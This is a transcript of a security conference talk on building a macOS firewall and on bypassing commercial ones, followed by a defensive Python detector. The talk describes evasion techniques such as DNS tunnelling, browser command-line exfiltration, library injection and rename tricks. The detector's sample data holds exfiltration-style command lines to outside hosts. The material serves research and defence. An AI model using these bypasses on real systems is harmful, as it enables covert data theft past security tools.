Fire & Ice: making and breaking mac firewalls

Video in TIB AV-Portal: Fire & Ice: making and breaking mac firewalls

Formal Metadata

Title
Fire & Ice: making and breaking mac firewalls
License
CC Attribution 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date
2018
Language
English

Content Metadata

Abstract
In the ever raging battle between malicious code and anti-malware tools, firewalls play an essential role. Many a malware has been generically thwarted thanks to the watchful eye of these products. However, on macOS, firewalls are rather poorly understood. Apple's documentation surrounding its network filter interfaces is rather lacking, and all commercial macOS firewalls are closed source. This talk aims to take a peek behind the proverbial curtain, revealing how to both create and 'destroy' macOS firewalls. In this talk, we'll first dive into what it takes to create an effective firewall for macOS. Yes, we'll discuss core concepts such as kernel-level socket filtering, but also how to communicate with user-mode components, install privileged code in a secure manner, and simple ways to implement self-defense mechanisms (including protecting the UI from synthetic events). Of course any security tool, including firewalls, can be broken. After looking at various macOS malware specimens that proactively attempt to detect such firewalls, we'll don our 'gray' (black?) hats to discuss various attacks against these products. And while some attacks are well known, others are currently undisclosed and can generically bypass even today's most vigilant Mac firewalls. But all is not lost. By proactively discussing such attacks, combined with our newly-found understanding of firewall internals, we can improve the existing status quo, advancing firewall development. With a little luck, such advancements may foil, or at least complicate the lives of, tomorrow's sophisticated Mac malware!
All right, aloha, and welcome to my talk on making and breaking Mac firewalls. My name is Patrick. I work at Digita Security, where we are creating cybersecurity tools for the Mac enterprise. I'm also the creator of the Mac security website Objective-See. So today, thank you, thank you, we're gonna be talking about creating or making a Mac firewall, and then we're gonna kind of shift gears and talk about breaking and bypassing such products. So about a year ago I decided I wanted to write a firewall for macOS because there were no free, open-source options, so in this section of the talk we'll describe this process: creating LuLu, which is my free, open-source Mac firewall.

Now there are many reasons you might want to create or install a firewall; they're actually pretty good security tools. Probably the two main reasons are, one, to protect your privacy, or two, to thwart cyber attacks, because most firewalls are able to generically detect malware when the malware connects out, perhaps to exfiltrate data or connect to a command and control server for tasking. So what our firewall is going to do is monitor all network traffic, allowing traffic out that's trusted and ideally blocking or preventing unauthorized or malicious traffic.

Now since we're going to need to monitor all traffic globally, we're going to have to write a kernel extension. In macOS, Apple provides network kernel extensions, or NKEs, as a way to extend or modify the network infrastructure, and one type of NKE is a socket filter, which, as its name suggests, allows code to filter network traffic at the socket level, which for a firewall is perfect; that's exactly what we need. Now there are two steps to register a socket filter. First we populate a socket filter structure, and this structure contains various callbacks that, once registered, will be automatically invoked by the operating system on certain socket operations, which then gives our firewall the ability to examine these socket actions and determine whether they should be allowed or blocked. So the second step is then to invoke the socket filter register function to install your socket filter. Now besides the populated structure, this also takes a socket domain, type and protocol, which means if you want to filter all socket domains, types and protocols, you should invoke this method or function several times.

Okay, so now let's talk about these callbacks, which, as I mentioned, once your socket filter is registered, will be automatically invoked by the operating system on socket events. The first callback is the attach callback, and as we can see on the slide, it will be invoked any time a new socket is created. So it's called with a cookie parameter that's designed to hold any socket-specific information; you can really put whatever you want there. So what we do is we allocate a chunk of memory, and based on the pid of the process that's creating the socket we either set it to allow, for example if it's a trusted system daemon, or block if it's a process that the user has chosen to block. Now if it's a process we don't recognize, we set this action to ask, and then we're gonna have to do some extra logic to determine what action to take. So next is the connect out callback. This is called before initiating an outgoing connection. Again it takes the same cookie, which we've set to either allow, block or ask, and the socket and the remote address that the socket is trying to connect to, so this obviously allows us to examine the endpoint. Now if the action has been set to allow, we just return OK; this tells the operating system we are OK with allowing this connection to continue. If it's set to block, we return an error code from this function, which tells the operating system we want to block or not allow the connection. And if it's set to ask, we have to execute some extra logic to determine what action to take.

So in other words, we have to figure out whether to allow or block the connection. So what we do is we first put the thread to sleep that's trying to perform the socket operation; this will pause the action. We then ask our user-mode firewall component for assistance, and we pass the information from the kernel, specifically the pid and the socket, via a shared queue. Once the daemon gets this request from the kernel socket filter, it maps the pid to a path and first checks a rules database to see if that path is in the database. If it's not found, perhaps it's a brand new application or a piece of malware that has somehow gotten onto your system, what it does is it sends a message to another firewall component that's running in the user's session, and this is what actually displays the firewall alert to the user. Now the user's response, they'll either have to click allow or block, will then be passed back to the daemon. The daemon will save this response to the rules database, so moving forward it knows what to do, and then also sends this response back to the kernel component via an I/O Kit interface. The kernel extension will then wake up the thread that was put to sleep and then apply the action, either allowing the connection or blocking it.

So that's basically all that's needed to create a comprehensive firewall for macOS, and putting this all together we have LuLu. As I mentioned, LuLu is a free firewall; I don't think end users should have to pay for security products. And also the full source for the firewall is online on GitHub, and as of today you can download and install version 1.0. Awesome.

Thank you, this friendly audience today, I really like this. All right, so DEF CON, in my opinion, is predominantly, you know, a hacker conference about breaking things and exploits and vulnerabilities, so let's kind of switch gears and talk now about breaking and bypassing such firewall products. So imagine you're an attacker or a piece of malicious code that has somehow made it onto an end system. Unfortunately there's a firewall that's installed, so if you are going to connect out, perhaps to exfiltrate data or connect to a command and control server, the firewall is going to detect and block this. So your goal is simple: how can you connect out without the firewall blocking this data? So in this section we'll first look at some firewall-aware malware, we'll then look at some security vulnerabilities in firewall products, and then end with ways to completely bypass the firewalls.

So first, it's definitely important for malware or an implant to detect if a firewall is installed on the box; otherwise it really might be their undoing, as the firewall may detect a previously undetected malware when it tries to connect out, and as we can see on the slide, this has happened. Now I've yet to see any public Mac malware that tries to specifically bypass Mac firewalls, but there are some specimens that are firewall aware, and what I mean by that is they will enumerate installed processes or look specifically for firewalls, and if they see an installed firewall they will not persistently infect that system. One example of this is DevilRobber, and what DevilRobber did is it looked for Little Snitch, which is a popular Mac firewall; if that was installed, it would not infect the system, it would just execute a benign instance of the application it had infected and then simply exit.

Okay, now on to some security issues. Software such as firewalls is often very complex, and firewalls often run with elevated privileges or even in the kernel. Now unfortunately they're not as well written as the operating system, nor have they been audited as well, which makes them excellent, excellent targets for local privilege vulnerabilities. So I talked about this bug at DEF CON a while ago, but just briefly to go over it: it's kind of a neat kernel bug that affected the Little Snitch firewall kernel extension. Basically the firewall took a 64-bit value from user mode and used that in an allocation and a copy routine. Unfortunately the allocation routine expected a 32-bit value, so it truncated that; however the copy routine expected a full 64-bit value, so it allowed us to have a controllable mismatch between the allocation and then the copy routine, which led to an exploitable heap overflow in the kernel, allowing us to execute arbitrary code in ring zero.

Another issue I found while briefly looking at Little Snitch affected its installer and updater component. In short, the firewall installer did not validate the components it was going to install, so a local unprivileged attacker could modify these components, and then the firewall installer or updater would naively install and execute them as root, again giving a local unprivileged attacker a very reliable way to elevate their privileges.

All right, now on to bypassing firewalls. We'll first look at some product-specific bypasses, but then we'll also look at some more powerful, generic ones that can bypass all third-party firewalls. Again the goal here is network access without being blocked. Now I do want to reiterate that in my opinion these bypasses are not security issues per se, like they don't deserve a CVE, but however they're still very valuable, especially for an attacker or piece of malware which may otherwise be thwarted by the firewall. So first up we have Radio Silence. It's a popular firewall for macOS. It kind of takes an interesting approach in that it allows any new process, but the user can explicitly blacklist certain applications. However, if we look at the blacklisting logic in the kernel extension, we can see it looking for the name of a process, and it appears if the process is named launchd it cannot be blacklisted nor blocked. So let's test this: we take some malware, we name it launchd (again, the path doesn't matter, just the name), and then we manually create a rule to blacklist this process. We then run it, and as we can see on the slide it's still allowed out, because again it is named launchd. So kind of lame, but again, fully bypasses this firewall.

Another popular Mac firewall is named Hands Off!, and it turns out that we can pretty easily bypass this via a synthetic click. So for example if we execute curl, which is something that Mac malware often does, for example to download additional components, as expected the firewall will detect this unauthorized activity and display an alert. What the attacker or malware can then do is send a programmatic synthetic click to that allow button, which will click the allow button, basically hiding the alert and allowing the connection. And it also turns out there are ways you can do this without the user noticing, so there are ways that you can do this invisibly, so that the user is not going to see the alert and this synthetic mouse click. Next up we have LuLu. By default LuLu trusts Apple binaries. Yeah, you know, I'm picking on everyone, including my own tools; you know, I think it's only fair. So LuLu by default trusts Apple-signed processes; however, it gray-lists certain Apple binaries which could potentially be abused for malicious activity. So for example netcat and curl: even though those are signed by Apple, it will still alert any time anybody executes them. So the question is, can we find another signed Apple utility that is not on the gray list? And the answer is yes.

Turns out you can exfiltrate data via the whois utility. Man, this was news to me. So as we can see on the slide, in the LuLu debug log, if we execute this, the firewall will see the outgoing connection, because again it's global, it sees all network traffic; however, because whois is signed by Apple proper and is not on the gray list, it will be allowed. Now note this has been fixed; I basically added whois to the gray list.

And finally we have Little Snitch. Little Snitch is the de facto, most well-known firewall for macOS. Turns out it has an undeletable rule that says any process can talk to icloud.com domains or URLs. This means any process, even malware, is allowed to talk to Apple servers. To test this we can manually create a deny rule for curl, and then we can execute curl with an iCloud URL, and it is still allowed. So a while back I reverse-engineered the iCloud protocol and built a C&C server on iCloud Drive for testing purposes (don't, don't get mad at me, Apple). So it actually is a great, like Dropbox-like C&C server, because you can get alerts when files are uploaded; it's, it's really great. So once we understand the protocol, what we can do is we can write some custom code that we can use to exfiltrate data. Now even if Little Snitch is installed and sees the connection, it will be allowed, because the endpoint we are talking to matches or maps to an iCloud domain.

Okay, so those were some product-specific bypasses, kind of neat, kind of funny, but in my opinion they're still a little bit lame, and they're lame because first an attacker would have to enumerate and determine the specific firewall product that was installed and then have one of these product-specific bypasses. Way more powerful are generic bypasses, which can just bypass any installed firewall, and these are all possible because the firewall is essentially disadvantaged: it has to allow some network traffic off the box, for example trusted system daemons, or the user is probably going to fully allow certain things like browsers. So the first thing we do to find a generic bypass, once we're on a system as a piece of malware or an attacker, is passively sniff to see what traffic is allowed off the box, and we can do this via the lsof utility. So if we execute this on a box, even though I have my firewall installed, obviously there's going to be some traffic that is allowed out, so for example we can see browsers, chat applications, some Adobe licensing crap, etc., etc.

So now we know what traffic, or what processes, are allowed through the firewall. So for the first generic bypass we're going to indirectly exploit the trust of a process via a trusted protocol. So on macOS, any time a DNS request is made, this is handled by Apple's mDNSResponder. This means if a random application or piece of malware tries to resolve a domain, the malware, the application, actually does not generate the network request; it's sent locally to the system daemon, which then, on the application's behalf, will resolve the domain. So what malware can do is basically abuse this fact, because yes, again, the firewall is going to see this DNS resolution, but since it's just a DNS request coming from the Apple-signed, trusted DNS daemon, which is handling all DNS requests for the entire system, the firewall is going to allow it. So very easily we can build a bidirectional command and control protocol purely based on DNS.

Next up, let's talk about abusing browsers, and the simple fact is, if you have a browser installed, it's going to be able to access the network. You know, even if you maybe say only port 80 and 443, you know, you're probably going to give it indiscriminate access to talk to any web server, and again we can passively determine this via lsof. So the first way we can abuse browsers is via AppleScript. So as we can see on the slide, we have kindly asked Safari to invisibly browse to an attacker-controlled URL, and any data we want to exfiltrate we can put in as a GET parameter. Again the firewall will see this connection, but as it's Safari simply browsing to a URL, it will not be blocked. Now an even better way to bypass any installed firewall is to abuse browsers' command-line interfaces; it really doesn't get any easier than this. All major browsers now support a command-line interface, so you can very easily programmatically execute them from a script or piece of malware from the command line, and again the firewall will see this connection, but it's just the browser browsing to some URL, so it will not block it.

Yet another way to generically bypass all third-party firewall products is to simply inject a library or code into an application or a binary that the firewall trusts; again, via lsof we can determine passively what those are. Now once this code, this library, is running in that trusted process, from the firewall's point of view it will also be given that same level of trust and thus can access the network. For example, if the browser is trusted and you inject code into the browser and that malicious code connects out, the firewall will allow it, because it just sees it as the browser. Now there's many ways on macOS to inject into, especially, third-party applications; we don't have time to go into all of them, but I have listed them here on the slide.

The final way to bypass kernels, or firewalls rather, involves getting code into the kernel, and the simple fact is, if an attacker is able to get code running in the kernel, it's completely game over for the firewalls. First, a lot of firewalls will generically allow traffic that is originated from the kernel, and secondarily, if malicious code is running in the kernel, it can actually unregister or unhook any installed socket filter driver. This will then transparently disable the firewall, and then the attacker's code, even from user mode, can connect out without having to worry about the firewall.

Okay, so let's start wrapping this up. So today we talked about building a firewall for macOS; we saw that using a socket filter kernel extension it's really not that complicated. As I mentioned, the source code for LuLu is on GitHub, so if you're interested in more of the details and specifics I would recommend checking that out. We then talked about breaking firewalls; we showed that a lot of them actually have significant security flaws, which are very problematic because the firewall is often run with root privileges or even in the kernel. And then we also showed that the unfortunate reality is these products are all trivial to generically bypass. Now this doesn't mean we should uninstall our firewall products, but I think it makes a good case for a defense-in-depth strategy, for example maybe some other host-based security products that can perhaps block some of the prerequisites for these attacks, for example preventing dylib injection, or perhaps can detect that the browser is running from the command line when the user is inactive. Like, that's not something a firewall should detect per se, but perhaps another security tool should.

And finally, today I'm really excited to announce a brand new Mac security conference called Objective by the Sea. We have a really cool lineup of Mac security researchers. It's also gonna be at this awesome resort in Hawaii, and if you're a supporter of Objective-See, which you can be for $1, the conference to attend is completely free. I just want to reiterate that it's in Hawaii; this is the actual resort of where it's gonna be, November 3rd and 4th, so I would love it if you could all attend, and for more information check out objectivebythesea.com. Okay, that's a wrap. I really want to thank you all for attending. Also want to thank the friends, the partners of Objective-See, which are Digita Security and Malwarebytes, and we have 13 seconds for questions, but I will be around here after the talk to obviously answer any other question.
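The talk closes by arguing that the prerequisites for the generic bypasses (a browser driven from the command line while the user is idle, code injected into a trusted process, trust granted by process name alone, a gray-listed Apple utility talking out) are something a host-based tool other than the firewall should catch. The following is an added example of that detection logic, written for this page and not taken from LuLu or the talk; it runs over constructed process records, and the browser names, launcher names, gray list, and the use of `DYLD_INSERT_LIBRARIES` as the injection indicator are assumptions of the example.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# All names below are assumptions for this example, not values from LuLu or the talk.
BROWSERS = {"Safari", "Google Chrome", "firefox"}            # executable names of browsers
GRAY_LIST = {"whois", "curl", "nc"}                           # Apple-signed tools worth alerting on
CLI_PARENTS = {"sh", "bash", "zsh", "osascript", "python3"}   # launchers that are not the GUI


@dataclass
class Proc:
    """One process record, in the shape a ps/lsof collector might produce (constructed)."""
    pid: int
    ppid: int
    name: str
    path: str
    args: List[str]
    env: Dict[str, str] = field(default_factory=dict)
    remote: str = ""            # remote endpoint of an open socket, "" if none
    user_active: bool = True    # was a user interacting with the session at the time


Finding = Tuple[int, str, str]  # (pid, severity, reason)


def parent_of(procs: List[Proc], p: Proc) -> Optional[Proc]:
    return next((q for q in procs if q.pid == p.ppid), None)


def detect(procs: List[Proc]) -> List[Finding]:
    """Flag the firewall-bypass prerequisites that a firewall alone will not catch."""
    findings: List[Finding] = []
    for p in procs:
        parent = parent_of(procs, p)
        has_url = any(a.startswith(("http://", "https://")) for a in p.args)
        # 1. A trusted browser driven from a shell/script with a URL on its command line.
        #    The firewall only sees "the browser browsing"; the launch context is the signal.
        if p.name in BROWSERS and has_url and parent is not None and parent.name in CLI_PARENTS:
            sev = "high" if not p.user_active else "medium"
            findings.append((p.pid, sev, f"browser launched by {parent.name} with URL argument"))
        # 2. Code injected into a trusted process via the dyld insert variable.
        lib = p.env.get("DYLD_INSERT_LIBRARIES")
        if lib:
            findings.append((p.pid, "high", f"DYLD_INSERT_LIBRARIES={lib} in {p.name}"))
        # 3. Trust decided by name alone: the real launchd is pid 1 at /sbin/launchd.
        if p.name == "launchd" and (p.pid != 1 or p.path != "/sbin/launchd"):
            findings.append((p.pid, "high", f"process named launchd at unexpected path {p.path}"))
        # 4. An Apple-signed, gray-listed utility with a live connection (the whois case).
        if p.name in GRAY_LIST and p.remote:
            findings.append((p.pid, "medium", f"{p.name} connected to {p.remote}"))
    return findings


# Constructed sample: a clean process tree plus one instance of each bypass prerequisite.
SAMPLE: List[Proc] = [
    Proc(1, 0, "launchd", "/sbin/launchd", ["/sbin/launchd"]),
    Proc(501, 1, "Safari", "/Applications/Safari.app/Contents/MacOS/Safari",
         ["Safari"], remote="17.253.144.10:443"),            # user-launched browsing: benign
    Proc(777, 1, "zsh", "/bin/zsh", ["zsh"]),
    Proc(778, 777, "Google Chrome",
         "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
         ["Google Chrome", "--headless", "https://example.invalid/?d=c2VjcmV0"],
         remote="203.0.113.5:443", user_active=False),
    Proc(802, 777, "whois", "/usr/bin/whois", ["whois", "-h", "203.0.113.5", "x"],
         remote="203.0.113.5:43"),
    Proc(903, 777, "launchd", "/tmp/launchd", ["/tmp/launchd"], remote="203.0.113.5:8080"),
    Proc(950, 1, "Safari", "/Applications/Safari.app/Contents/MacOS/Safari", ["Safari"],
         env={"DYLD_INSERT_LIBRARIES": "/tmp/injected.dylib"}, remote="203.0.113.5:443"),
]


def run_sample() -> List[Finding]:
    return detect(SAMPLE)


if __name__ == "__main__":
    for pid, sev, why in run_sample():
        print(f"pid {pid:<5} {sev:<6} {why}")
```

The user-launched Safari record produces no finding, which is the point: the signal is the launch context, the environment, the path, or the gray list, not the connection itself.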
Feedback